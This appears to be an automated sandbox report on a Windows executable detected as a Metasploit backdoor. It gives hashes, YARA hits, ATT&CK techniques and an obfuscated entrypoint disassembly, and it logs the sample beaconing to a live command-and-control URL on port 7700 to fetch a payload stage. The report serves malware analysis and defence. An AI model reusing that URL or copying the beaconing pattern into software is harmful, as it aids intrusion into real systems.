Source: C:\Users\user\Desktop\DRVf7H9j4V.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe	Section loaded: winnsi.dll	Jump to behavior

Source: C:\Users\user\Desktop\DRVf7H9j4V.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: DRVf7H9j4V.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: C:\local0\asf\release\build-2.2.14\support\Release\ab.pdb source: DRVf7H9j4V.exe

Source: C:\Users\user\Desktop\DRVf7H9j4V.exe	Code function: 0_2_00401877 pushad ; retf	0_2_00401A79
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe	Code function: 0_2_004070D9 push ebx; iretd	0_2_004070DD
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe	Code function: 0_2_004012DB push FFFFFFCAh; ret	0_2_00401308
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe	Code function: 0_2_00402779 push ebp; ret	0_2_0040277A
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe	Code function: 0_2_00405123 push edi; retn 0010h	0_2_00405125
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe	Code function: 0_2_00401527 push esi; ret	0_2_00401528
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe	Code function: 0_2_004055C6 push edx; ret	0_2_004055C9
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe	Code function: 0_2_004017D1 pushad ; retf	0_2_00401A79
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe	Code function: 0_2_004079EC push eax; retf	0_2_004079ED
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe	Code function: 0_2_00401DFC push 00401450h; iretd	0_2_00401E0A
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe	Code function: 0_2_00403F92 push ebp; ret	0_2_00403F9A
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe	Code function: 0_2_004017BC pushad ; retf	0_2_00401A79

Source: DRVf7H9j4V.exe

Static PE information: section name: .text entropy: 7.017108244459124

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 7700
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 7700
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 7700
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 7700
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 7700
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 7700
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 7700
Source: unknown	Network traffic detected: HTTP traffic on port 63653 -> 7700
Source: unknown	Network traffic detected: HTTP traffic on port 63654 -> 7700
Source: unknown	Network traffic detected: HTTP traffic on port 63655 -> 7700

Source: C:\Users\user\Desktop\DRVf7H9j4V.exe TID: 6108

Thread sleep time: -45000s >= -30000s

Jump to behavior

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: DRVf7H9j4V.exe, 00000000.00000002.2240362748.0000000000777000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: DRVf7H9j4V.exe, 00000000.00000002.2240362748.000000000078D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%%,b
Source: DRVf7H9j4V.exe, 00000000.00000002.2240362748.000000000078D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Remote Access Functionality

Yara detected Metasploit Payload

Source: Yara match	File source: DRVf7H9j4V.exe, type: SAMPLE
Source: Yara match	File source: 0.0.DRVf7H9j4V.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DRVf7H9j4V.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2240322277.0000000000690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1451835611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	2 Software Packing	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 DLL Side-Loading	Security Account Manager	1 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	111 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	1 Ingress Tool Transfer	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
DRVf7H9j4V.exe	82%	ReversingLabs	Win32.Backdoor.Swrort
DRVf7H9j4V.exe	100%	Avira	TR/Patched.Gen2
DRVf7H9j4V.exe	100%	Joe Sandbox ML

Name	Malicious	Antivirus Detection	Reputation
http://89.197.154.115:7700/K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://89.197.154.115:7700/K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kq	DRVf7H9j4V.exe, 00000000.00000002.2240362748.000000000078D000.00000004.00000020.00020000.00000000.sdmp, DRVf7H9j4V.exe, 00000000.00000002.2240362748.00000000007AE000.00000004.00000020.00020000.00000000.sdmp	true	unknown
http://www.apache.org/licenses/LICENSE-2.0	DRVf7H9j4V.exe	false	unknown
http://www.apache.org/	DRVf7H9j4V.exe	false	unknown
http://www.zeustech.net/	DRVf7H9j4V.exe	false	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
89.197.154.115	unknown	United Kingdom		47474	VIRTUAL1GB	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1520612
Start date and time:	2024-09-27 16:47:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	DRVf7H9j4V.exe renamed because original name is a hash value
Original Sample Name:	ef9e66020f10a61f05bc865b167248d5.exe
Detection:	MAL
Classification:	mal100.troj.winEXE@1/0@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 86% Number of executed functions: 9 Number of non-executed functions: 13
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: DRVf7H9j4V.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
89.197.154.115	XkObGXcie5.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	89.197.154.115:7700/XTFk

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
VIRTUAL1GB	Xwl3DsNmN2.exe	Get hash	malicious	CobaltStrike, Metasploit, ReflectiveLoader	Browse	89.197.154.115
	Windows11.exe	Get hash	malicious	Metasploit	Browse	193.117.208.101
	Trial.bat	Get hash	malicious	Empire	Browse	193.117.208.101
	Ti1p9tvbSW.exe	Get hash	malicious	Metasploit	Browse	89.197.154.116
	NUBuymtQ4b.exe	Get hash	malicious	Metasploit	Browse	89.197.154.116
	ealpZ0zoQi.exe	Get hash	malicious	Metasploit	Browse	89.197.154.116
	pA826G7Zi6.exe	Get hash	malicious	Metasploit	Browse	89.197.154.116
	SecuriteInfo.com.Linux.Siggen.9999.18891.22819.elf	Get hash	malicious	Unknown	Browse	89.197.225.199
	hwveg8aUBB.bat	Get hash	malicious	Metasploit	Browse	89.197.154.116
	kurCc0UDBg.exe	Get hash	malicious	Metasploit	Browse	89.197.154.116

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.320795398128895
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	DRVf7H9j4V.exe
File size:	73'802 bytes
MD5:	ef9e66020f10a61f05bc865b167248d5
SHA1:	d17d15d3234e278a6110d1f23ea3369c5c68238c
SHA256:	ec8e8680522e7ecb16043670512d860de1f5ee95b7c3cadb4b6612e92a21af77
SHA512:	dd241344746df57562bcaded738acf032a4e6b1d969aabd5ce0fee2a132b730ab5a2ed3525d9f917ea108b26f8a1f94cec1fe003084a87e000805d9998dd5b24
SSDEEP:	1536:IdySJofJXkkx6aplLfDogqZrDmxPOmHMZovycMb+KR0Nc8QsJq39:HSWJ6AdPq5uD/e0Nc8QsC9
TLSH:	CE73BF8285C84426D192113D67723B77AEB4F5FA3312C2DA794CCDE5EBD18B0926A3C7
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........8...Y...Y...Y...E...Y..TE...Y...F...Y...F...Y...Y...Y..TQ...Y...z...Y..._...Y..Rich.Y..................PE..L...[l.J...........

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x40acb7
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x4A186C5B [Sat May 23 21:36:27 2009 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	481f47bbb2c9c21e108d65f52b04c448

Entrypoint Preview

Instruction
aaa
std
salc
xchg eax, ebx
salc
cld
dec ecx
dec edx
xchg eax, edx
xchg eax, edx
aaa
std
dec eax
xchg eax, ebx
std
clc
aaa
cmc
inc eax
cmc
daa
inc ecx
xchg eax, ecx
inc eax
aaa
inc eax
dec eax
stc
aaa
inc ecx
cwde
cmc
std
inc eax
clc
cmc
wait
das
cwde
cmc
wait
lahf
stc
dec ebx
dec eax
cmc
lahf
salc
daa
std
dec ebx
inc ecx
xchg eax, ecx
inc edx
inc eax
dec ebx
stc
clc
nop
cdq
xchg eax, edx
aas
wait
inc ecx
lahf
xchg eax, ebx
xchg eax, edx
dec eax
dec ecx
lahf
daa
cmc
inc ecx
dec eax
clc
cld
inc ebx
dec ebx
inc ecx
xchg eax, ebx
lahf
dec ecx
dec eax
dec ecx
inc eax
cdq
dec edx
daa
lahf
inc ecx
cld
inc edx
xchg eax, ebx
cmc
aas
std
wait
xchg eax, edx
salc
aas
inc ebx
das
xchg eax, ecx
wait
inc edx
dec edx
std
salc
salc
dec ebx
cmc
inc ecx
dec edx
dec edx
aas
aas
clc
stc
std
dec ecx
stc
dec ecx
inc edx
inc edx
aas
stc
clc
cdq
wait
nop
xchg eax, ebx
salc
inc eax
jmp 00007F63A47FF584h
mov eax, dword ptr [ebp-04h]
dec esi
mov edi, edx
not al
mov ecx, dword ptr [ecx]
jnbe 00007F63A48092DCh
fdiv st(0), st(4)
pop ecx
dec dword ptr [ebx-763F97FEh]
call 00007F635705A2C1h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc76c	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x15000	0x7c8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0xc1e0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xc000	0x1e0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xa966	0xb000	be0895c261ed1f2c36850c00f27cbd88	False	0.8146750710227273	data	7.017108244459124	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xc000	0xfe6	0x1000	25d7ceee3aa85bb3e8c5174736f6f830	False	0.46142578125	DOS executable (COM, 0x8C-variant)	5.318390353744998	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xd000	0x705c	0x4000	283b5f792323d57b9db4d2bcc46580f8	False	0.25634765625	Matlab v4 mat-file (little endian) d, numeric, rows 0, columns 0	4.407841023203495	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x15000	0x7c8	0x1000	c13a9413aea7291b6fc85d75bfcde381	False	0.197998046875	data	1.958296025171192	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x15060	0x768	data	English	United States	0.40189873417721517

Imports

DLL	Import
MSVCRT.dll	_iob, _except_handler3, __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, __p___initenv, _XcptFilter, _exit, _onexit, __dllonexit, strrchr, wcsncmp, _close, wcslen, wcscpy, strerror, modf, strspn, realloc, __p__environ, __p__wenviron, _errno, free, strncmp, strstr, strncpy, _ftol, qsort, fopen, perror, fclose, fflush, calloc, malloc, signal, printf, _isctype, atoi, exit, __mb_cur_max, _pctype, strchr, fprintf, _controlfp, _strdup, _strnicmp
KERNEL32.dll	PeekNamedPipe, ReadFile, WriteFile, LoadLibraryA, GetProcAddress, GetVersionExA, GetExitCodeProcess, TerminateProcess, LeaveCriticalSection, SetEvent, ReleaseMutex, EnterCriticalSection, DeleteCriticalSection, InitializeCriticalSection, CreateMutexA, GetFileType, SetLastError, FreeEnvironmentStringsW, GetEnvironmentStringsW, GlobalFree, GetCommandLineW, TlsAlloc, TlsFree, DuplicateHandle, GetCurrentProcess, SetHandleInformation, CloseHandle, GetSystemTimeAsFileTime, FileTimeToSystemTime, GetTimeZoneInformation, FileTimeToLocalFileTime, SystemTimeToFileTime, SystemTimeToTzSpecificLocalTime, Sleep, FormatMessageA, GetLastError, WaitForSingleObject, CreateEventA, SetStdHandle, SetFilePointer, CreateFileA, CreateFileW, GetOverlappedResult, DeviceIoControl, GetFileInformationByHandle, LocalFree
ADVAPI32.dll	FreeSid, AllocateAndInitializeSid
WSOCK32.dll	getsockopt, connect, htons, gethostbyname, ntohl, inet_ntoa, setsockopt, socket, closesocket, select, ioctlsocket, __WSAFDIsSet, WSAStartup, WSACleanup, WSAGetLastError
WS2_32.dll	WSARecv, WSASend

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2024 16:48:07.285060883 CEST	49704	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:48:07.290663958 CEST	7700	49704	89.197.154.115	192.168.2.8
Sep 27, 2024 16:48:07.290751934 CEST	49704	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:48:07.290910006 CEST	49704	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:48:07.296689987 CEST	7700	49704	89.197.154.115	192.168.2.8
Sep 27, 2024 16:48:08.929980040 CEST	7700	49704	89.197.154.115	192.168.2.8
Sep 27, 2024 16:48:08.930071115 CEST	49704	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:48:08.930639029 CEST	49704	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:48:08.935415030 CEST	7700	49704	89.197.154.115	192.168.2.8
Sep 27, 2024 16:48:13.947911024 CEST	49705	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:48:13.952990055 CEST	7700	49705	89.197.154.115	192.168.2.8
Sep 27, 2024 16:48:13.953099012 CEST	49705	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:48:14.034622908 CEST	49705	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:48:14.039520025 CEST	7700	49705	89.197.154.115	192.168.2.8
Sep 27, 2024 16:48:15.632065058 CEST	7700	49705	89.197.154.115	192.168.2.8
Sep 27, 2024 16:48:15.632210970 CEST	49705	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:48:15.632404089 CEST	49705	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:48:15.637361050 CEST	7700	49705	89.197.154.115	192.168.2.8
Sep 27, 2024 16:48:20.646162987 CEST	49706	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:48:20.651185036 CEST	7700	49706	89.197.154.115	192.168.2.8
Sep 27, 2024 16:48:20.651284933 CEST	49706	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:48:20.651420116 CEST	49706	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:48:20.656600952 CEST	7700	49706	89.197.154.115	192.168.2.8
Sep 27, 2024 16:48:22.237344027 CEST	7700	49706	89.197.154.115	192.168.2.8
Sep 27, 2024 16:48:22.237468004 CEST	49706	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:48:22.237622976 CEST	49706	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:48:22.242470980 CEST	7700	49706	89.197.154.115	192.168.2.8
Sep 27, 2024 16:48:27.242530107 CEST	49713	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:48:27.247556925 CEST	7700	49713	89.197.154.115	192.168.2.8
Sep 27, 2024 16:48:27.247736931 CEST	49713	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:48:27.248523951 CEST	49713	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:48:27.253443003 CEST	7700	49713	89.197.154.115	192.168.2.8
Sep 27, 2024 16:48:28.846395969 CEST	7700	49713	89.197.154.115	192.168.2.8
Sep 27, 2024 16:48:28.846558094 CEST	49713	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:48:28.846669912 CEST	49713	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:48:28.851411104 CEST	7700	49713	89.197.154.115	192.168.2.8
Sep 27, 2024 16:48:33.849343061 CEST	49714	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:48:33.854461908 CEST	7700	49714	89.197.154.115	192.168.2.8
Sep 27, 2024 16:48:33.854608059 CEST	49714	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:48:33.854751110 CEST	49714	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:48:33.859591961 CEST	7700	49714	89.197.154.115	192.168.2.8
Sep 27, 2024 16:48:35.440608025 CEST	7700	49714	89.197.154.115	192.168.2.8
Sep 27, 2024 16:48:35.440773010 CEST	49714	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:48:35.440881014 CEST	49714	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:48:35.445682049 CEST	7700	49714	89.197.154.115	192.168.2.8
Sep 27, 2024 16:48:40.443249941 CEST	49715	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:48:40.448215008 CEST	7700	49715	89.197.154.115	192.168.2.8
Sep 27, 2024 16:48:40.448355913 CEST	49715	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:48:40.448544979 CEST	49715	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:48:40.453278065 CEST	7700	49715	89.197.154.115	192.168.2.8
Sep 27, 2024 16:48:42.068162918 CEST	7700	49715	89.197.154.115	192.168.2.8
Sep 27, 2024 16:48:42.068270922 CEST	49715	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:48:42.068398952 CEST	49715	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:48:42.073319912 CEST	7700	49715	89.197.154.115	192.168.2.8
Sep 27, 2024 16:48:47.085689068 CEST	49716	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:48:47.090668917 CEST	7700	49716	89.197.154.115	192.168.2.8
Sep 27, 2024 16:48:47.090785027 CEST	49716	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:48:47.095710039 CEST	49716	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:48:47.100516081 CEST	7700	49716	89.197.154.115	192.168.2.8
Sep 27, 2024 16:48:48.742861032 CEST	7700	49716	89.197.154.115	192.168.2.8
Sep 27, 2024 16:48:48.742944956 CEST	49716	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:48:48.745078087 CEST	49716	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:48:48.750086069 CEST	7700	49716	89.197.154.115	192.168.2.8
Sep 27, 2024 16:48:53.755589008 CEST	63653	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:48:53.760560989 CEST	7700	63653	89.197.154.115	192.168.2.8
Sep 27, 2024 16:48:53.763885975 CEST	63653	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:48:53.764013052 CEST	63653	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:48:53.768867970 CEST	7700	63653	89.197.154.115	192.168.2.8
Sep 27, 2024 16:49:07.277578115 CEST	7700	63653	89.197.154.115	192.168.2.8
Sep 27, 2024 16:49:07.277687073 CEST	63653	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:49:07.277825117 CEST	63653	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:49:07.283054113 CEST	7700	63653	89.197.154.115	192.168.2.8
Sep 27, 2024 16:49:12.286906958 CEST	63654	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:49:12.291991949 CEST	7700	63654	89.197.154.115	192.168.2.8
Sep 27, 2024 16:49:12.292115927 CEST	63654	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:49:12.292284966 CEST	63654	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:49:12.297576904 CEST	7700	63654	89.197.154.115	192.168.2.8
Sep 27, 2024 16:49:13.897751093 CEST	7700	63654	89.197.154.115	192.168.2.8
Sep 27, 2024 16:49:13.897838116 CEST	63654	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:49:13.898063898 CEST	63654	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:49:13.902849913 CEST	7700	63654	89.197.154.115	192.168.2.8
Sep 27, 2024 16:49:18.913669109 CEST	63655	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:49:18.918634892 CEST	7700	63655	89.197.154.115	192.168.2.8
Sep 27, 2024 16:49:18.918781042 CEST	63655	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:49:18.918940067 CEST	63655	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:49:18.924060106 CEST	7700	63655	89.197.154.115	192.168.2.8
Sep 27, 2024 16:49:20.528995991 CEST	7700	63655	89.197.154.115	192.168.2.8
Sep 27, 2024 16:49:20.529052973 CEST	63655	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:49:20.533181906 CEST	63655	7700	192.168.2.8	89.197.154.115
Sep 27, 2024 16:49:20.538019896 CEST	7700	63655	89.197.154.115	192.168.2.8

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2024 16:48:51.121382952 CEST	53	57343	162.159.36.2	192.168.2.8
Sep 27, 2024 16:48:51.693257093 CEST	53	64761	1.1.1.1	192.168.2.8

HTTP Request Dependency Graph

89.197.154.115:7700

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49704	89.197.154.115	7700	4136	C:\Users\user\Desktop\DRVf7H9j4V.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 16:48:07.290910006 CEST	328	OUT	GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0 Host: 89.197.154.115:7700 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49705	89.197.154.115	7700	4136	C:\Users\user\Desktop\DRVf7H9j4V.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 16:48:14.034622908 CEST	328	OUT	GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0 Host: 89.197.154.115:7700 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49706	89.197.154.115	7700	4136	C:\Users\user\Desktop\DRVf7H9j4V.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 16:48:20.651420116 CEST	328	OUT	GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0 Host: 89.197.154.115:7700 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49713	89.197.154.115	7700	4136	C:\Users\user\Desktop\DRVf7H9j4V.exe

Timestamp	Bytes transferred	Direction	Data
